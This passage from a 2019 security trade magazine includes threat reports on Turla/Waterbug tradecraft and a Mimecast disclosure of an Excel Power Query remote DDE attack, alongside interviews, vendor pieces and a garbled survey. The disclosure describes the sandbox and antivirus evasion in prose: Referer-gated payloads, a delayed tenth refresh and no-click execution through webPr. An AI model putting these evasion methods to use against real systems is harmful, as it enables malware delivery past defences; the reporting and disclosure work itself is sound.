network were compromised with Waterbug tools on January 12, but there is no evidence that Crambus infrastructure was used in these attacks. While one of these computers had been previously compromised by Crambus, the other showed no signs of Crambus intrusion. Waterbug’s intrusions on the victim’s network continued for much of 2018. On September 5, 2018, a similar Mimikatz variant was dropped by Waterbug’s Neptun backdoor onto another computer on the network. At around the same time, other Waterbug malware was seen on the victim’s network which communicated with known Waterbug C&C servers. Finally, the issue was clouded further by the appearance of a legitimate systems administration tool called IntelliAdmin on the victim’s network. This tool is known to have been used by Crambus and was mentioned in the leak of Crambus documents. However, in this case, IntelliAdmin was dropped by custom Waterbug backdoors, including the newly identified Neptun backdoor, on computers that had not been affected by the Crambus compromise. The incident leaves many unanswered questions, chiefly relating to Waterbug’s motive for using Crambus infrastructure. There are several possibilities: 1. False flag: Waterbug does have a track record of using false flag tactics to throw investigators off the scent. However, if this was a genuine attempt at a false flag operation, it begs the question of why it also used its own infrastructure to communicate with other machines on the victim’s network, in addition to using tools that could be traced back to Waterbug. 2. Means of intrusion: It is possible that Waterbug wanted to compromise the target organization, found out that Crambus had already compromised its network, and hijacked Crambus’s own infrastructure as a means of gaining access. Symantec did not observe the initial access point and the close timeframe between Waterbug observed activity on the victim’s network and its observed use of Crambus infrastructure suggests that Waterbug may have used the Crambus infrastructure as an initial access point. 3. Mimikatz variant belonged to Crambus: There is a possibility that the version of Mimikatz downloaded by the Crambus infrastructure was actually developed by Crambus. However, the compilation technique and the fact that the only other occasion it was used was linked to Waterbug works against this hypothesis. The fact that Waterbug also appeared on the victim’s network around the same time this version of Mimikatz was downloaded would make it an unlikely

J U LY 2 019

REAL-LIFE

by the use of a combination of custom malware and publicly available tools. Also, during both campaigns Waterbug executed multiple payloads nearly simultaneously, most likely to ensure overlapping access to the network if defenders found and removed one of the backdoors. Waterbug took several steps to avoid detection. It named Meterpreter as a WAV file type, probably in the hope that this would not raise suspicions. The group also used GitHub as a repository for tools that it downloaded post-compromise. This too was likely motivated by a desire to evade detection, since GitHub is a widely trusted website. It used Certutil.exe to download files from the repository, which is an application whitelist bypass technique for remote downloads. In one of these campaigns, Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest. It then packages stolen files into a password-protected RAR archive. The malware then uses WebDAV to upload the RAR archive to a Box account.

UNANSWERED QUESTIONS

WATERBUG LIKELY COMPROMISED THE C&C NETWORK INFRASTRUCTURE OF CRAMBUS

coincidence if the tool did belong to Crambus. 4. Opportunistic sowing of confusion: If a false flag operation wasn’t planned from the start, it is possible that Waterbug discovered the Crambus intrusion while preparing its attack and opportunistically used it in the hopes of sowing some confusion in the mind of the victim or investigators. Based on recent leaks of Crambus internal documents, its Poison Frog control panel is known to be vulnerable to compromise, meaning it may have been a relatively trivial diversion on the part of Waterbug to hijack Crambus’s infrastructure. A compromise conducted by one threat actor group through another’s infrastructure, or fourth party collections, has been previously discussed in a 2017 white paper by Kaspersky researchers.

FURTHER CAMPAIGNS Waterbug has also mounted two other campaigns over the past year, each of which was characterized by separate tools. These campaigns were wide ranging, hitting targets in Europe, Latin America, and South Asia.

J U LY 2019

In the first campaign, Waterbug used two versions of a custom loader named javavs.exe (64-bit) and javaws.exe (32-bit), to load a custom backdoor named PhotoBased.dll and run the export function GetUpdate on the victim’s computers. The backdoor will modify the registry for the Windows Media Player to store its C&C configuration. It also reconfigures the Microsoft Sysinternals registry to prevent pop-ups when running the PsExec tool. The backdoor has the capability to download and upload files, execute shell commands, and update its configuration. In the second campaign, Waterbug used an entirely different backdoor, named securlsa. chk. This backdoor can receive commands through the RPC protocol. This RPC backdoor also included source code derived from the tool PowerShellRunner, which allows a user to run PowerShell scripts without executing powershell. exe, therefore the user may bypass detection aimed at identifying malicious PowerShell usage. While both campaigns involved distinct tools during the initial compromise phase, there were also many similarities. Both were characterized

This is the first time Symantec has observed one targeted attack group seemingly hijack and use the infrastructure of another group. However, it is still difficult to ascertain the motive behind the attack. Whether Waterbug simply seized the opportunity to create confusion about the attack or whether there was more strategic thinking involved remains unknown. Waterbug’s ever-changing toolset demonstrates a high degree of adaptability by a group determined to avoid detection by staying one step ahead of its targets. Frequent retooling and a penchant for flirting with false flag tactics have made this group one of the most challenging adversaries on the targeted attack landscape.

PROTECTION/MITIGATION Symantec has the following protection in place to protect customers against these attacks:

FILE-BASED PROTECTION l l

Backdoor.Whisperer Hacktool.Mimikatz

THREAT INTELLIGENCE The DeepSight Managed Adversary and Threat Intelligence (MATI) team co-authored this blog and its customers have received intelligence with additional details about these campaigns, the characteristics of the Waterbug (aka Turla) cyber espionage group, and methods of detecting and thwarting activities of this adversary. ë

Protect Your Information Wherever It Travels

Data Classification, DLP, and CASB only solve part of your data security challenge. Seclore Data-Centric Security makes it easy to unify your best-of-breed solutions and automatically add granular usage controls as information is discovered, classified, and shared. Ensure your information is protected and trackable wherever it travels with Seclore.

We look forward to showing you Seclore Data-Centric Security in action during the Future of IT Summit 2019, Dubai

www.seclore.com

TOP EXECUTIVE

GEORGE EAPEN, GROUP CISO, PETROFAC

J U LY 2019

TOP EXECUTIVE

YOU GOT TO HAVE IT

‘RIGHT’ With more than 14 years of experience in the cyber security industry, George Eapen, Group CISO of Petrofac, shares with Cyber Sentinels the key tools required for a CISO.

n B Y: D I V S H A B H AT < D I V S H A @ G E C M E D I A G R O U P. C O M >

Petrofac is a leading international service provider to the oil and gas production and processing industry. With around 11,500 employees, Petrofac operates out of seven strategically located operational centres, in Aberdeen, Sharjah, Abu Dhabi, Woking, Chennai, Mumbai and Kuala Lumpur and has a further 24 offices worldwide. In 2018, Petrofac generated almost $6 billion of revenue. Mr. George Eapen, Group CISO, manages Petrofac’s cyber security risks. With 14 years of experience in the industry, George previously worked as a CISO for GE International covering their global regions outside of the US. Across the globe, the cybersecurity skill gap is nothing new. The nature and severity of this skills gap fosters debate across the industry. Most importantly, the cybersecurity skill gap has grown to almost three million globally, contributing to concerns around attracting and retaining sufficient skills in the cybersecurity industry. George’s view is: “The MENA region is filled with cybersecurity experts. But what we lack is not the quantity but the quality of people with the RIGHT skills. A person

J U LY 2 019

TOP EXECUTIVE

J U LY 2019

TOP EXECUTIVE

TOP PRIORITIES

Ensuring that the Enterprise IT is secure

Ensure correct regulatory compliance methods

Taking care of my Team

may have a cybersecurity certification but if he or she does not have a specific skill to do the job, if the right attitude, it would be of no use to the organization. My general observation is that there are people around but with missing skills.”

THE RIGHT TOOLS THAT EVERY BUSINESS NEEDS Sound security begins with knowing the right skills and tools. Cybersecurity is something that every business needs to take seriously. With major hacking attacks in the region, affecting all sizes of businesses, it is important to be aware of the dangers. Having the right tools in place with highly skilled resources to combat cyber threats is extremely vital. George believes that in a phase at present where the risk landscape is changing and hackers are using sophisticated methods for attacks, CISOs must be up to date with the latest technologies. “Ensuring that the company is protected should be the key mantra of any CISO. Staying compliant with regulations of multiple countries is also important if the company is an multi-national company like Petrofac.” As a Group CISO, George makes sure to stay compliant with the regulations of all the jurisdictions the Group is operating in.

THE KEY SKILLS Cybersecurity is a vast domain to build expertise in various security subjects like identity and access management, endpoint protection, etc. But George says that the key skill any CISO needs is the presence of mind. “He or she should be a clear thinker and good communicator who can articulate business or cyber risk in a simple language that non cyber or non-IT people understand. By ensuring that one is not breaking the existing operations or making employee experience difficult, they should always balance the act,” he comments. Also, undoubtedly, being a CISO is not a stress-free job. Having passion to stretch yourself to go the extra mile is necessary. To keep up with ever-changing technical challenges, training and certifications on various security subjects is a must. “Staying up to date with the latest happenings in the cyber security field, attending workshops and seminars, networking with other cyber security professionals for exchange of ideas are some of the skills required for a CISO. Personally, I feel any organization should consider the most knowledgeable security person when it

comes to cybersecurity,” he says. “In the present era, we are always connected to the internet. So, there is no risk-free environment. Besides being the gatekeeper of the company, one should be an excellent messenger as well who can articulate Cyber risks to the leadership.”

DIGITAL TRANSFORMATION – BUT ARE YOU SECURED? With emerging technologies like Internet of Things (IoT), Blockchain, and Artificial Intelligence, George sees digital transformation as inevitable. “Organizations are striving for better productivity and operational efficiency with the same or lesser number of resources to stay ahead of competition. But there is no point in digital transformation if you cannot keep it secure. The role of the CISO is to make sure to have the right controls in place while ensuring that the company is protected.” he says. Giving a perfect example, he says, the job of a CISO is like applying breaks while the car is moving. A CISO is confident and drives the organization faster if he knows he is well protected by the breaks (security solutions). He will never push the accelerator or abruptly use the breaks in a way that might damage the car (company). “We know there is a control and we can slow down whenever needed for new initiatives.”

UPSIDE AND DOWNSIDE OF CYBERSECURITY SOLUTIONS George says that any CISO wouldn’t look for solutions for their business based on the brand, relationships or a particular product’s popularity. “A solution that which can solve my problem is what I look for. I implement a solution if it solves our purpose and the bridges the gap in our organization. Implementing technologies blindly is not my option.” In spite of his busy schedule, George makes times to meet vendors and channel partners as he believes that it educates him about the new technologies and solutions. “I only focus on the vendors/ solutions that solve my issues. I know the market is filled with new technologies and solutions every day but I won’t look at implementing everything that’s out there. Building a relationship with vendors or at the least r maintaining it is good for future opportunity and gives us options.” ë

J U LY 2 019

VENDOR TALKS

MINIMIZING THE THREAT LANDSCAPE THROUGH AUGMENTING HUMAN SECURITY TEAMS Today’s security threats are evolving each day, with security teams having to monitor everything from the data centre to the edge, as well as the millions of connected devices which log in to their systems each year. The workplace is currently in flux – we can work from mobile devices in any location we choose as well as working with many different applications. When things change, security teams have to readjust policies and controls. Is it fair to expect them to chase after us, all day, every day to keep us safe? CIOs can no longer ignore the high-profile attacks that continue to threaten organisational reputations around the world. It’s no wonder that security is the top of the agenda in many boardrooms or that a new C, the CISO (Chief Information Security Officer), has joined the management team. Protecting the organisation is obviously a huge priority. But how is this actually achievable, unless we are able to anticipate the small, but significant, changes that are happening on the network day to day? If we are asking human security teams to constantly monitor the data being shared by incoming and existing devices, which can easily reach into the thousands for a large enterprise, then we are creating security systems that lack the ability to scale in line with the threats. Because human teams can get tired and make mistakes (they are human), the most common approach is to make blanket rules and restrictions across the network to serve as a catch-all against new inbound threats. The problem here, is that very quickly the user experience suffers. Which in turn, can affect productivity, and even morale. This is where machine learning come to the aid of human security teams.

AUGMENTING, NOT REPLACING With machine learning, there is an ability to detect minute changes in data that would likely slip through traditional defences. Using machine

J U LY 2019

RABIH ITANI REGIONAL BDM - SECURITY MIDDLE EAST & TURKEY, ARUBA, A HPE COMPANY

learning for NTA (Network Traffic Analysis) and UEBA (User and Entity Behavioural Analytics), we are able to set historical and peer baselines for every single device connecting to the network, from the latest user mobile device to the air conditioning unit, connected as part of a new IoT initiative. Everything is quickly recognised, profiled and connected, giving each connected entity, its own unique risk profile and its current risk score. As soon as a device behaves in a way that strays outside of its recognised profile or baseline, the network sees it, and takes action. This action could be to raise the risk, re-route the data for deeper analysis to confirm if the anomaly is malicious or immediately raise an alert, which compels human security teams into action. Assuming

there is no wrongdoing, the user experience is not impacted, beyond perhaps being asked to confirm the activity was indeed them and all is OK. In the case of anomaly itself is confirmed to be malicious based on discrete attack analytics or in case the case a full Kill Chain is confirmed, the NAC (Network Admission Control) systems can be triggered with manual or even automated response to quarantine the device from the rest of the network in order limit any potential damage that might have occurred. All because the machine is analysing millions of individual packets of data and thousands of systems logs, all the time. It’s a job that no human team can realistically do, or would want to do. With machine-led security continually learning, adjusting baselines and detecting new threat patterns, humans teams are not usurped. They are enormously aided, by being alerted only to the issues that they really need to inspect. This automatic monitoring offers security staff exceptional time savings, which actually means an improvement to their job role. Instead of fighting fires, security teams will be able to focus on building better IT experiences across their organisation, and saying yes to new innovations. Security teams may actually become a revenue driver for the business.

HOW SECURITY IMPACTS THE WORKPLACE The tasks of human security workers may well change as the world of machine learning, building to full AI, begins to accelerate. But we should never fear change. Especially when the likely new roles carry even wider business relevance. The promise of machine learning is there, but it still needs highly skilled teams to build it into the core of the network, re-apply it to other business areas, and proactively monitor it for new insights. We’re faced by intelligent threats, targeting valuable user data, across a network that has more end points (and entry points) than can be counted. Isn’t it about time we acknowledge that human security staff need the help they can get? ë

UPTO

10TB CAPACITY

SUPPORTS UPTO

CAMERAS

247

OPERATION

READY FOR

NVR, DVR HYBRID DVR & RAID STORAGE

180 TB/YEAR WORKLOAD

UPTO

256MB BUFFER SIZE

ROTATION VIBRATION

RV SENSOR

REAL-LIFE

EXPLOIT USING MICROSOFT EXCEL POWER QUERY FOR REMOTE DDE EXECUTION DISCOVERED

Mimecast Threat Center discovered a weakness in the Microsoft Excel tool that allows embedding malicious payloads remotely. Mimecast Threat Center found and developed a technique that uses a feature in Microsoft Excel called Power Query to dynamically launch a remote Dynamic Data Exchange (DDE) attack into an Excel spreadsheet and actively control the payload Power Query. Power Query is a powerful and scalable Business Intelligence (BI) tool that lets users integrate their spreadsheets with other data sources, such as an external database, text document, another spreadsheet, or a web page, to name a few. When sources are linked, the data can be loaded and saved into the spreadsheet, or loaded dynamically (when the document is opened, for example). Mimecast Threat Center found that Power Query could also be used to launch sophisticated, hard-to-detect attacks that combine several attack surfaces. Using Power Query, attackers could embed malicious content in a separate data source, and then load the content into the spreadsheet when it is opened. The malicious code could be used to drop and execute malware that can compromise the user’s machine. The feature gives such rich controls that it can be used to fingerprint a sandbox or a victim’s machine even before delivering any payloads. The attacker has potential pre-payload and pre-exploitation controls and could deliver a malicious payload to the victim while also making the file appear harmless to a sandbox or other security solutions. Mimecast worked with Microsoft as part of the Coordinated Vulnerability Disclosure (CVD) process to determine if this is an intended behavior for Power Query, or if it was an issue to be addressed. Microsoft declined to release a fix at this time and instead offered a workaround to help mitigate the issue. A detailed walkthrough of a potential exploit using Power Query to launch a DDE exploit that could drop and execute a payload from a file sharing-site.

J U LY 2019

THREATS USING POWER QUERY AS AN ATTACK SURFACE Because Power Query is a powerful took within Microsoft Excel, the potential threat for abusing the feature is great. If exploited, it can be used to launch sophisticated attacks that combine several potential attack surfaces, from local privilege escalation, DDE attacks and remote

code execution exploits. The Power Query feature is designed to allow you to embed remote content easily and dynamically. Such attacks are usually hard to detect and gives threat actors more chances to compromise the victim’s host. Using the potential weakness in Power Query, attackers could potentially embed any malicious payload that as designed won’t be saved inside the document itself but downloaded from the web when

REAL-LIFE

THE REMOTE CONTENT IS FETCHED AND LOADED INTO THE SPREADSHEET.

the document is opened. To demonstrate how Power Query can be used to launch a DDE exploit, an external webpage hosting the payload was loaded into the spreadsheet and it could write a custom, simple HTTP server to host the payload on a web page to be served. The HTTP server listened locally on port 80 and served DDE content as a response when a request was received from the spreadsheet. The Wireshark capture data was used to see the attack flow. The first marked packet contained the DDE formula: the DNS request for “dropbox. com” where the payload.exe, and the HTTPS session were stored and delivered the payload.

ANALYZING THE FILE FORMAT Upon the examination of the file format, we saw that “table/table1.xml” was created with the properties “name: “localhost”” (default), and “type: “queryTable.”” The link between the table and the specific query table properties was described in .”rels” stream (“_rels/table1.xml.rels”), which contained a field named “target” and which pointed to “../queryTables/queryTable1.xml.” The quetyTable1.xml contained data linking “connection. xml” (which gathers all document connection properties) using the “connectionId” field. under “<queryTable>.” The connection was made with the dbPr object using the “Select *” command. The web query itself was stored in “xl\customXL\item1” document and was encoded in base64. To make the DDE run, the user is required to double click the cell that loads the DDE and to then click again to release it. Those operations will

trigger the DDE and launch the payload that was received from the web.

BYPASSING THE NEED TO DOUBLE CLICK – ENABLING AUTOMATED EXECUTION To bypass the “click for run” issue, the discovery that in old versions of Microsoft Office, there are some differences in the “Get External Data>> From Web” implementation. As mentioned, “dbPr” is created when using Microsoft Office 2016, and the user is required to act to activate the payload (in some cases such as sandboxes, those clicks can cause a sandbox bypass). When “Get External Data>> From Web” is used in older versions of office (e.g, 2010), the object created under “Connections.xml” is not “dbPr” as mentioned earlier but “webPr,” which is much simpler. Unlike “dbPr,” “webPr” does not required any user actions to run the payload.

BYPASSING AVS AND SANDBOXES USING THE EXPLOITED POWER QUERY TOOL Adding headers to the web request (query) so that the payload could bypass anti-virus and sandboxing capabilities designed to block exactly this kind of malicious content. The web server served up malicious content only when a specific HTTP Header was present in the request. The anti-virus extracted the URL of the HTTP server from the file but did not parse the headers. When the AV sent a test request, the server knew this was from the AV and not the spreadsheet. The DDE will be served only when the “Referer” HTTP header is set to “www.google.com.” Otherwise, the content won’t be served. By setting the specific web header by using

Power Query in “Advanced” mode. Power Query performed the web request with the requested “Referer” header. If another application tries to partially simulate the Power Query behavior and doesn’t request the web page with the right “Referer” header, the payload will be served only when opening the original document using the Microsoft Excel application. Since the sandbox would also send the custom header as part of the request, a new way to avoid detection was needed. The “auto refresh” and “refresh” intervals were used in Power Query, instead Avoiding malicious content that could potentially mark this file as malware by forcing the file to refresh data when opening the file and removing data from the external data range before saving. Those properties ensure that the payload in the file will update when the file is opened. Setting the file to refresh every minute (the minimum time) and served the payload at the 10th query. This mean every sandbox that executed the file in less than 10 minutes would never get our payload. In the case of the example provided, most of the static-analyzing AVs won’t detect the file (which doesn’t contain the payload) and sandboxes or other security solutions that download the content only once or twice will miss it as well.

WORKAROUND AND CLOSING The Mimecast Threat Center team reached out to the Microsoft Security Response Center (MRSC) with our information and a working proof of concept. MRSC opened a case but Microsoft decided not to fix this behavior, and their response included a workaround by either using a Group Policy to block external data connections or use the Office Trust center to achieve the same. MRSC accepted our request to publish this research per the CVD policy. Microsoft published an advisory (4053440) that indicates steps and procedures to provide information regarding security settings for Microsoft Office applications. This advisory provides guidance on what users can do to ensure that these applications are properly secured when processing Dynamic Data Exchange fields. Attackers are looking to subvert the detections that victims have. While there is a chance that this kind of attack may be detected over time as threat intelligence is shared between various security experts and information sharing platforms, Mimecast strongly recommends all Microsoft Excel customers implement the workarounds suggested by Microsoft as the potential threat to these Microsoft users is real and the exploit could be damaging. ë

J U LY 2 019

TOP OF MIND

LEVERAGING CTI TO BENEFIT ORGANISATIONS’ SECURITY POSTURE

Over the last year, we have seen the CTI community growing and diversifying; as a result, the way threat intelligence is being used has also evolved. However, a survey conducted by SANS, sponsored by ThreatQuotient, recently revealed that 1 out of 5 companies are still unsure of CTI’s value to their organisation. COLLABORATE WITH GOVERNMENTS AND ISACS

CTI analyses information about the intent, capabilities and opportunities of adversaries in cyberspace. It is a valuable resource for organisations and individuals serving in roles requiring to be prepared for the wide range of threats that their organisation is facing. To help organisations realise the value of CTI, we compiled a list of benefits this resource can bring:

TRACKING THREAT BEHAVIOURS Security organisations tend to consider intelligence as an indicator feed. They’re not wrong, but CTI can offer so much more value than that. Not only does it help to enrich alerts with technical details about specific attacks and campaigns, it is also a source of information around threat behaviours and adversary TTPs. Encouragingly, 27% of the SANS survey’s respondents perceived this as the greatest value to their threat detection and response. As organisations become more familiar with threat behaviours, adversary TTPs and how to leverage them, these figures will certainly continue to rise.

IDENTIFY DIGITAL FOOTPRINT OR ATTACK SURFACE IDENTIFICATION It comes as no surprise therefore that 81% organisations have seen their security and response improve since they started producing or leveraging CTI. For those organisations who are unsure about the impact of CTI on their security and response, they should consider, and measure, the average resolution time of security incidents when CTI analysts participate and compare to those times to when they didn’t. This would help them to appreciate how much it has enriched the understanding of security incidents and response but also the process, allowing to resolve issues quicker.

FIND A SHARING PARTNERSHIP THAT WILL BENEFIT YOUR ORGANISATION

J U LY 2019

ANTHONY PERRIDGE, VP OF INTERNATIONAL, THREATQUOTIENT

We mention collaboration above, and CTI shows even more value as it isn’t limited to the private sector. Indeed, security teams also have the opportunity to share their intelligence and collaborate with their peers in the government and other public entities. Collaboration with the latter can be done through an Information Sharing and Analysis Centre (ISAC) - a non-profit organisation providing a central resource to gather information related to cyber threats to critical infrastructure. Such centre is based on a two-way sharing of information between the private and public sector. Surprisingly, the SANS survey revealed that this smart way to make the most of the intelligence and better defend against threat has only seduced 40% of organisations. The biggest value propositions of CTI coming from governments and ISACs perceived by these were the timely and relevant threat information, points of contact at member organisations and advocacy in the community for security.

A GROWING INTEREST FROM THE PUBLIC SECTOR In recent years, we have seen a growing interest in collaborating and sharing information amongst security teams. As a result of this trend, multiple solutions have emerged providing organisations with the right tools to tackle cyber threats such as threat library, endpoint detection and penetration testing. Beyond the data being shared, information sharing programmes have a wide range of benefits. From point-of-contacts to advocacy for security and best practices, participating in an information-sharing group provides a secure and confidential environment for organisations to increase situational awareness and reduce the impact on organisations.

Whilst sources of government CTI are multiplying, only half of the community is actually taking advantage of it. Yet, governments have matured their own understanding of private sector cyber threats over the last years. They can now give additional context and track adversary behaviours including their tactics, techniques and procedures (TTPs), and don’t have to only rely on indicators of compromise (IoCs) anymore. The problem with IoCs is that they gained lot of attention on the market even though they simply indicate computer intrusions. In a nutshell, they tend to be too generic to provide long-term and strategic intelligence value. ë

TOP OF MIND

ADDRESSING THE CYBER WARFARE OF THE FUTURE

“With over 17 years of domain experience, Tech Mahindra’s Enterprise Security & Risk Management Services team is a trusted advisor – consultant, systems integrator and program project manager. We are taking an end to end ownership of the solution platform being proposed and manage of Enterprises.”

monitoring IT inventories and take appropriate mitigating steps.We have also partnered with an Israel based startup to develop advanced cybersecurity solutions like cybercrime investigation, cybercrime policing and analytics. Furthermore, Tech Mahindra has signed a Memorandum of Understanding (MOU) with Indian Institute of Technology Kanpur (IIT Kanpur) to collaborate and co-create superior research based solutions in cyber security. Tech Mahindra’s national-grade cybersecurity capability and expertise across industries addresses the cyber warfare of the future. Tech Mahindra will enable the companies to design and deliver bespoke Security Operation Centres (C-SOCs), Computer Emergency Response Teams (CERTs) and Forensic Laboratories, leveraging the state- of- the- art automation and orchestration tools, Artificial Intelligence (AI) and Machine learning analytics (ML) and best of breed technology. We also offer consultation, training and managed security services, based on national grade methodologies andprocedures, and develop future ready technologies to meet the evolving challenges of the cyber domain. Our global experience of securing Enterprise and Telecom customers provides a great opportunity to build customized cybersecurity products in the space of Advanced Threat Management, Internet of Things (IoT), 5G, connected devices and securing Internet of Everything in our digital world.

RAJIV SINGH, GLOBAL HEAD OF CYBERSECURITY, TECH MAHINDRA

How does Tech Mahindra ensure that the customer’s business is secured against national grade threats and attacks? With an increase in the cyber security incidents,

J U LY 2019

it is becoming crucial for organizations to secure networks and protect data. Tech Mahindra has developed the World’s First AI-Powered Predictive Cyber Risk Platform that can predict and proactively avoid cyber-breaches by continuously

Brief our readers about your innovative solutions and services. With over 17 years of domain experience, Tech Mahindra’s Enterprise Security & Risk Management Services team is a trusted advisor – consultant, systems integrator and program project manager. We are taking an end to end ownership of the solution platform being proposed and manage of Enterprises.

TOP OF MIND

Tech Mahindra’s Enterprise Security & Risk Management (ESRM) portfolio of services includes

The customized services for Customers include the following l Threat Monitoring, Analytics and Incident Management l Security Infrastructure Device Management l VA-PT, Security-Assurance, Vulnerability-Management l Brand Monitoring and Protection Services l SOC in a Box, Compliance Audit, Identity & Access Management l Threat-Analysis, Risk Assessment, General Data Protection Regulation (GDPR) as a Service l Security Audit/Strategy l Cloud Security Monitoring l ETDR as a Service Tech Mahindra has created Automated Security Assurance platform (ASAP) which provides Continuous Assurance on Compliance and Risk management for the Board of Directors of the customers. How do you plan to develop internal capabilities to handle cybersecurity solutions? While AI, Machine Learning and Deep Learning have been largely employed by Security Device

l Advanced Threat Management l Cloud Security l Application Security l IoT Security l OT Security services in Manu facturing, Automotive, Utilities and Energy Verticals l Identity & Access Management l Governance Risk & Compliance

OEM’s (Original Equipment Manufacturer), at the same time adversaries are also brewing AI based tactics and techniques to launch attacks. While we defend AI based solutions from cyber attacks, it is equally important to secure the data analytics from such incidents. We recommend counter insurgency measures to detect adversaries AI based attacks to simultaneously defeat and address its root causes. Several sandboxing environments are built to detect underlying malwares launched by adversaries based on AI based techniques. Military grade deception technologies are deployed to deceive AI based attempts on critical assets. We leverage MITRE’s Kill Chain analysis that demonstrates more than 400+ adversaries attack behaviors that includes AI and Machine Learning. In the event of AI based attacks propagating the assets, Tech Mahindra proposes an agent based Incident and Forensics handlers to detect and prevent propagation of attacks on other machines. We can automatically conduct forensics on infected machines, isolate the machine from the network, inspect the malware and build counter measures. Tech Mahindra proposes pro-active measures based on NIST principles (Identify, Protect,

Detect, Respond and Recover). Protect gears include file less memory based attack detection at runtime. AES 256 encryption both at Data, at Rest and in Transit, Distributed Denial-ofService (DDoS) protection for critical servers. Tech Mahindra also recommends periodic Vulnerability Assessment and Penetration Testing to discover known threats based on common vulnerability exposure. What are your plans for the Middle East region with 2020 coming in next year? Due to strategic and economic significance of The Gulf Corporation Council (GCC) region, it has become the centre point for cyber attacks. The government organizations as well as sectors like Banking, Financial Services and Insurance (BFSI), energy and utilities are more prone to cyber security breach and that has lead to an uptake in the demand for better security products. Tech Mahindra would like to help circumvent from cyber espionage, cyberattack and help in business continuity, compliance management and help in the brand reputation of Middle Eastern companies. ë

J U LY 2 019

SURVEY

INFORMATION SECURITY SURVEY 2018 INFORMATION SECURITY SURVEY 2018

In 2018 SearchInform held a number of seminars conducting Road Show in 4 regions worldwide. South Africa, the Middle East and North Africa, Latin America and CIS have taken part in the annual anonymous survey presenting the relevant level of data risk awareness and expertise from across 10 industries, including IT, power engineering, manufacturing and transport, finance and banking, retail, hospitality, healthcare, state defense, logistics construction. In 2018and SearchInform held a number of seminars conducting Road Show in 4 regions worldwide. South Africa, Middle East North Africa, Latin America and CIS have taken part in the annual anonymous survey 15the countries haveand shared their experience and methods introduced to protect the corporate network presenting the relevant level of data risk awareness and expertise from across 10 industries, including IT, power engineering, manufacturing and transport, finance and banking, retail, hospitality, healthcare, state defense, logistics and construction. 15 countries have shared their experience and methods introduced to protect the corporate network

WHICH SOLUTIONS ARE INSTALLED TO PROTECT A CORPORATE NETWORK WHICH SOLUTIONS ARE INSTALLED TO PROTECT A CORPORATE NETWORK Antivirus 93% 79% 93%

Firewall/Proxy Antivirus

78% 79%

Administration toolsFirewall/Proxy for Windows

29%

DLP Administration tools for Windows

23% 29%

IDS/IPS DLP

23% 12%

IDS/IPS SIEM SIEM Spam filters

78%

12% 11%

Spam filters Data is not protected

11% 1%

Data is not protected

WHICH CHANNELS ARE CONTROLLED WHICH CHANNELS ARE CONTROLLED

73% 73% Email

48%

26% 26%

J U LY 2019

29%

35% Telephony

29% Documents sent to print Documents

Telephony

devices

Messengers Messengers

35%

48% External storage devices External storage

25% 25%

Cloud storage Cloud storage

sent to print

8% 8% All All

WHICH WAS LEAKED LEAKEDIN IN2017-2018 2017-2018 WHICHINFORMATION INFORMATION WAS

26%

25%

Messengers

Cloud storage

All

SURVEY

WHICH INFORMATION WAS LEAKED IN 2017-2018

35% Trade secret

17%

16%

Technical information

Personal data

WHO APPEARS TO BE A VIOLATOR 59%

Employees

21%

Accountant/economist/financier Managers

19%

Assistant manager/secretary

16%

IT specialists

15%

WHICH SANCTIONS ARE IMPOSED

49%

34%

Dismissal

32%

Fine/Cutting bonuses

12% Prosecution

Reprimand

No sanctions

ARE THERE ANY CORPORATE REGULATIONS INTRODUCED

77%

18%

EMPLOYEE SIGN A NON-DISCLOSURE AGREEMENT

THERE ARE NO REGULATIONS

DO CLIENTS OR MEDIA SOURCES GET INFORMED ABOUT A LEAK? J U LY 2 019

SURVEY

77%

18%

EMPLOYEE SIGN A NON-DISCLOSURE AGREEMENT

THERE ARE NO REGULATIONS

DO CLIENTS OR MEDIA SOURCES GET INFORMED ABOUT A LEAK?

49%

21%

No, a leak is not announced

Yes, clients get informed

Yes, a media announcement is made

THE NUMBER OF LEAKS INCREASED IN 2018

15%

YES

58%

62% and 68% of South African and MENA countries’ companies accordingly don’t have a specific department monitoring information usage and assign IT officers to manage data safety issues

62%

68%

SOUTH AFRICAN COMPANIES

MENA COUNTRIES’ COMPANIES

40%

38%

of MENA companies disallow remote control software (TeamViewer)

of organisations in Lebanon, Iraque and Egypt have forbidden remote control software

SOUTH AFRICA IS THE ONLY COUNTRY SHOWING EQUAL DATA LEAK SCORE DUE TO INTERNAL AND EXTERNAL VIOLATIONS

38%

of companies indicated a hacker attack to be the reason

38%

selected computer/hardware theft or loss among the answers

of organisations were affected by corporate fraud

Human factor is identified as the biggest threat according to the respondents representing each of the regions which participated in the survey, and Latin America shows the highest percentage

74%

79%

of organisations consider negligence the most repeated peril

of companies in Latin America think of human factor as a major security breach provoker

Alexei Parfentiev, leading analyst at SearchInform We observe the willing of managers to foreknow a problem, to understand the incentives, the reasons which make employees compromise corporate assets. And it is not just about monitoring loyalty issues – negative feedback and sabotage. Employers seek to comprehend the problems of their staff members, to recognise situations which might undermine the wellbeing of the colleagues and interfere with business processes: drug or gambling addiction, extremism. Such an approach has a positive effect on a company’s internal workflow and increases the level of security in the regions.

SURVEY RESULTS IN PDF

J U LY 2019

Swing

Local

Connect

Global

2019-20 AUSTRALIA AZERBAIJAN BAHRAIN BOTSWANA CANADA CHINA EGYPT FRANCE GERMANY GHANA

INDIA INDONESIA IRELAND ITALY KAZAKHSTAN KENYA MADAGASCAR MALAYSIA MAURITIUS NEW ZEALAND

PARTICIPATING COUNTRIES

NEPAL NIGERIA OMAN PAKISTAN PORTUGAL RWANDA RUSSIA SAUDI ARABIA SCOTLAND SINGAPORE

SRI LANKA SPAIN SOUTH AFRICA SWITZERLAND THAILAND TURKEY UAE UNITED KINGDOM US ZIMBABWE

60 QUALIFYING ROUNDS

4500 C-LEVEL EXECUTIVES

FOR MORE VISIT: www.gecopen.com CONTACT: ronak@gecmediagroup.com, vineet@gecmediagroup.com, bharat@gecmediagroup.com

Deep Dive

the impersonators of the internet Identity has always been a central concept to human society, culture and our very existence. Tales of impersonation and masquerading abound in recorded history, mythology and literature. What else can explain the amount of money the society is willing to spend on Hollywood and its various national avatars?

